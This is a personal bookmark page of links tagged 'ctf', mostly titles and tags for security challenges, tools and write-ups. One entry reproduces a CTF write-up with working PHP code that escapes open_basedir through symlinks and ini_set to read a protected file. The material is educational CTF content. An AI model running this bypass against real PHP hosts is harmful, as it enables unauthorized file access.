776 links
  • Shared Bookmarks
  • Home
  • Login
  • RSS Feed
  • ATOM Feed
  • Tag cloud
  • Picture wall
  • Daily
Links per page: 20 50 100
11 results tagged ctf x
  • thumbnail
    SECFORCE/droidground: A simple playground for Android CTF challenges.
    June 11, 2025 at 1:38:28 PM UTC * - permalink -
    QRCode
    - https://github.com/SECFORCE/droidground?tab=readme-ov-file
    android droidground pentest ctf
  • 52.0.228.201/writeup.txt

    This challenge was about bypassing PHP open_basedir when having a restricted arbitrary PHP code execution. Most of commons functions to execute commands were blocked.

    The initial solution that was intended used the following facts :

    • open_basedir can be tampered at runtime with ini_set, but is restricted by open_basedir itself (in other words, we should only be able to harden the existing rule)
    • open_basedir on symlink is working
    • call ini_set for open_basedir checks are only done at the time of changing the rule; the file system can change then

    That means that we can point open_basedir to a regular file under /tmp/, and then switch it to a symlink pointing to ../../../../[...] - but to create such a symlink, we need to create an arborescence that allows do to so without breaching the rule :

    chdir('/tmp');
    $x='';
    for($i=0;$i<10;$i++){
    mkdir('z');
    chdir('z');
    $x.='../';
    }
    symlink($x,'x');
    symlink($x,'y');
    ini_set('open_basedir','x:y:/tmp/x');
    rename('x',$x.'/x');
    chdir('y');
    chdir('x');
    ini_set('open_basedir','/:/tmp/z');
    echo file_get_contents('/flag.txt');

    Congratz to every solvers!
    Blaklis

    September 26, 2024 at 8:39:29 AM UTC * - permalink -
    QRCode
    - http://52.0.228.201/writeup.txt
    php bypass open_basedir ctf
  • thumbnail
    Writeup du challenge Black Badge de LeHack 2019 · GitHub

    Writeup du challenge Black Badge de LeHack 2019. GitHub Gist: instantly share code, notes, and snippets.

    June 1, 2023 at 4:23:17 PM UTC - permalink -
    QRCode
    - https://gist.github.com/fvln/827383426d25d3f1af6605d2556d5ef6
    lehack ctf badge blackbadge virtualabs aes ctr crypto
  • thumbnail
    Ethernaut
    October 3, 2022 at 2:33:54 PM UTC - permalink -
    QRCode
    - https://ethernaut.openzeppelin.com/
    wargame ctf blockchain web3
  • thumbnail
    Solving "includer's revenge" from hxp ctf 2021 without controlling any files
    September 7, 2022 at 9:09:08 AM UTC - permalink -
    QRCode
    - https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d
    rce lfi ctf filter php
  • thumbnail
    Adrian ⛩️ Hetman 🐺⚔️ on Twitter: "How to make a jump from Web2 hacking to Web3 hacking? This is the question I started getting over DMs and I decided to answer all of them in a form of a Twitter thread so other can learn to. knowledge will be compressed so keep that in mind🙃 Here we go! 🧵👇 https://t.co/Y5C55Ze8dO" / Twitter
    January 2, 2022 at 2:18:18 PM UTC - permalink -
    QRCode
    - https://twitter.com/adrianhetman/status/1475550508354093072
    blockchain ethereum hacking ctf defi web3 sc smart contract
  • thumbnail
    How we found Unintended bypass to exploiting entire CyberThreatForce discord server | by Muhammad Faqih Jihan Insani | Jul, 2021 | Medium
    July 7, 2021 at 10:12:22 AM UTC * - permalink -
    QRCode
    - https://hanasuru.medium.com/how-we-found-unintended-bypass-to-exploiting-entire-cyberthreatforce-discord-server-d93951b9efab
    cyberthreatforce ctf writeup discord bot rce python jail
  • thumbnail
    GitHub - hellman/xortool: A tool to analyze multi-byte xor cipher
    July 5, 2021 at 1:32:28 AM UTC - permalink -
    QRCode
    - https://github.com/hellman/xortool
    xortool xor ctf
  • thumbnail
    Nightmare (binary exploitation)
    April 20, 2020 at 3:08:18 PM UTC - permalink -
    QRCode
    - https://guyinatuxedo.github.io/
    binary exploitation pwn reverse engineering re ghidra gdb pwntools ctf
  • thumbnail
    Encoding Web Shells in PNG IDAT chunks | Application Security
    November 15, 2019 at 2:38:28 PM UTC - permalink -
    QRCode
    - https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/
    encoding web shell png stega stegano hacking pentest ctf chall php idat
  • thumbnail
    [FR] Writeup du challenge Richelieu 2019 de la DGSE
    June 17, 2019 at 9:06:22 AM UTC - permalink -
    QRCode
    - https://inshallhack.org/richelieu_dgse_2019/
    writeup challenge ctf dgse richelieu rop cryptography bof stack smashing
Links per page: 20 50 100
Shaarli - The personal, minimalist, super fast, database-free, bookmarking service by the Shaarli community - Help/documentation